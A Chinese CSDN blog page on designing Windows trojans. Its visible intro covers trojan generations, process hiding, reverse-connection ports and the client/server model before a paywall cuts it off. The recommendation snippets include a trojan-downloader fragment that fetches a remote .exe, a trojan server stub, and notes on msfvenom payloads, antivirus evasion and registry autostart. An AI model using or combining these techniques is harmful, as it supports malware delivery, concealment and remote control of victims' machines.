WINDOWS系统下木马程序的设计与实现

最新推荐文章于 2022-11-22 13:51:07 发布
最新推荐文章于 2022-11-22 13:51:07 发布
阅读量1k 收藏 2
点赞数 1
文章标签: windows dll 服务器 hook api security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DelPhi7292117/article/details/5305283
版权

WINDOWS系统下木马程序的设计与实现

2010-1-10     作者:尘封 QQ:763934197

    近年来,黑客攻击层出不穷,对网络安全构成了极大的威胁。木马是黑客的主要攻击手段之一,它通过渗透进入对方主机系统,从而实现对目标主机的远程操作,破坏力相当之大。

    到目前为止,木马的发展已经历了五代:

    第一代木马只是实现简单的密码窃取、发送等,在隐藏和通信方面均无特别之处。
    第二代木马的典型代表是冰河,它以文件关联方式启动,通过电子邮件传送信息,在木马技术发展史上开辟了新的篇章。
    第三代木马的信息传输方式有所突破,采用ICMP协议,增加了查杀的难度。
    第四代木马在进程隐藏方面获得了重大突破,采用插入内核的嵌入方式、利用远程插入线程技术、嵌入DLL线程、或挂接PSAPI等,实现木马程序的隐藏,利用反弹端口技术突破防火墙限制,在Windows NT/2000下取得了良好的隐藏效果。
    第五代木马与病毒紧密结合,利用操作系统漏洞,直接实现感染传播的目的,而不必象以前的木马那样需要欺骗用户主动激活,例如最近新出现的类似冲击波病毒的木马—噩梦II。

    木马的关键技术

    木马基于C/S模式,服务器端程序运行于被控制的主机上,客户端完成控制功能。设计木马时,需考虑几个关键因素:首先要具有深度的隐蔽性,保证木马的隐蔽运行和启动,其次要能顺利实现客户端与服务器端的通信,最后还要根据需要实现其他功能。

一、木马的隐藏

   

最低0.47元/天 解锁文章
DelPhi7292117
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一个简单木马程序实现
天绝弑杀
06-09 1万+
一个简单木马的实现,麻雀虽小,五脏俱全,用到了socket和窗口隐藏技术
木马植入的方法
Sunny
01-26 1万+
Windows 系统下,木马可以通过注册表、Win.ini、system.ini、Autoexec.bat 和Config.sys、捆绑替换系统文件、启动菜单及程序配置. i n i 文件来自我启动运行。① Win.in:[WINDOWS]下面,“run=”和“load=”行是Windows 启动时要自动加载运行的程序项目;② System.ini:[BOOT]下面有个“shell=Explor
实现一个c/s模式的简单木马
新博客:https://aping-dev.com/
12-24 781
服务器:#include "iostream" #include "winsock2.h" #include "string.h" #pragma comment (lib, "ws2_32") #pragma comment(lib, "Winmm.lib ") using namespace std;#define HELPMSG "help - Show help menu \n"\
msfconsole之制作windows木马并成功获取shell
qq_56228347的博客
11-22 3530
msfconsole制作windows木马并上线获取控制权限
Windows进程管理系统的分析与设计.pdf
10-11
Windows系统中,存在一个叫pspcidtable的表,该表的结构非常复杂,且独立于系统进程链表,使得从pspcidtable表隐藏进程非常困难。通过使用系统内核pspcidtable表来实现进程枚举,然后在应用态下调用toolhlp32 api...
分布式多用户远程控制与密取系统设计实现.pdf
08-09
分布式多用户远程控制与密取系统是一种专门设计用于计算机远程取证的技术方案,旨在克服现有远程取证工具在实际操作中的局限性。系统的核心是利用“木马”加壳免杀技术,这种技术能够绕过多种主流的杀毒软件和木马...
计算机病毒与木马程序设计剖析- 修改系统文件(源代码)
04-22
修改系统文件 modifyfile.vcproj 这是使用“应用程序向导”生成的 VC++ 项目的主项 目文件。它包含有关生成文件的 Visual C++ 版本的 信息,以及有关用“应用程序向导”所选择的平台、 配置和项目功能的信息。 modifyfile.h 这是应用程序的主头文件。它包含其他项目特定的头 文件(包括 Resource.h),并声明CmodifyfileApp 应用程序类。 modifyfile.cpp 这是包含应用程序类 CmodifyfileApp 的主应用程序 源文件。 modifyfile.rc 这是程序使用的所有 Microsoft Windows 资源的列 表。它包含存储在RES子目录中的图标、位图和光标。 可直接在 Microsoft Visual C++ 中编辑此文件。项 目资源包含在 2052 中。 res\modifyfile.ico 这是一个图标文件,用作应用程序的图标。此图标包 含在主资源文件 modifyfile.rc 中。 res\modifyfile.rc2 此文件包含不由 Microsoft Visual C++ 编辑的资源。 应将所有不能由资源编辑器编辑的资源放在此文件中。 //////////////////////////////////////////////////// 应用程序向导将创建一个对话框类: modifyfileDlg.h、modifyfileDlg.cpp - 对话框 这些文件包含 CmodifyfileDlg 类。此类定义应用程 序主对话框的行为。此对话框的模板包含在 modifyfile.rc 中,而此文件可以在 Microsoft Visual C++ 中进行编辑。 //////////////////////////////////////////////////// 其他功能: ActiveX 控件 应用程序支持使用 ActiveX 控件。 打印支持和打印预览支持 应用程序向导已生成了一些代码,通过从 MFC 库调用 CView 类中的成员函数来处理打印、 打印设置和打印 预览命令。 //////////////////////////////////////////////////// 其他标准文件: StdAfx.h、StdAfx.cpp 这些文件用于生成名为 modifyfile.pch 的预编译头 文件 (PCH)和名为 StdAfx.obj 的预编译类型文件。 Resource.h
windows环境下32位汇编语言程序设计
09-20
最后的理由根本不是理由,而是必然的选择,当我们在Windows环境下进行加密解密、逆向工程,还有病毒、木马等有害代码的分析和防治工作时,Win32汇编是唯一的选择。在任何讨论这方面内容的书籍中,汇编代码的篇幅总是...
C--课程设计-基于反弹Socket通信的windows系统后门实现.doc
最新发布
06-29
标题:“C--课程设计-基于反弹Socket通信的windows系统后门实现” 描述:“C--课程设计-基于反弹Socket通信的windows系统后门实现” 标签:“计算机” 知识点总结: 1. 后门程序的定义和功能:后门程序是一种留...
简单木马程序设计
05-09 1万+
简单木马程序设计    当你有一门语言基础时和简单的网络知识后就可以开始,C语言就足够了。知道什么是TCP/IP就可以了,需要知道API函数(自己会查就可以了)。 实质上,木马仅仅是一个网络应用程序一样,就象
vc++编写一个木马下载器,体积仅有0.3K
尹成的技术博客
03-29 3182
#include #pragma link "w32inet.lib" int main(){HRESULT hRet=URLDownloadToFile(0,"http://www.1111.com/abc.exe","d://abc.exe",0,0); if(hRet==S_OK) {         printf("Download OK!/n");} else {         p
DELPHI下打造自己的简单木马
蓝色的雨
10-15 2448
今天晚上无聊写着玩的,如果你是高手就别看了,免得我丢人。本文章只适合初学DELPHI小菜。刚学电脑时很喜欢网络安全,看着高手们写的一个又一个攻击工具,自己也总想努力去学好编程去写属于自己的程序。学DELPHI快一年了,感觉什么都没学到,惭愧啊。今晚突然想学着写木马,于是手忙脚乱的敲了点代码,超简单,愿自己能越写越好!!!程序跟传统木马一样,分服务端和客户端。运行服务端后会复制自身到SYSTEM32
制作免杀windows木马(Winpayloads )
weixin_33717298的博客
07-11 1253
工具链接 https://github.com/nccgroup/Winpayloads 简介 Winpayloads 是一款制作免杀windows木马的工具 安装 下载git clone https://github.com/nccgroup/Winpayloads.gitcd Winpayloads 安装chmod +x setu...
利用msfvenom制作windows木马及免杀马
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马: msfvenom -a x86 --platform window...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值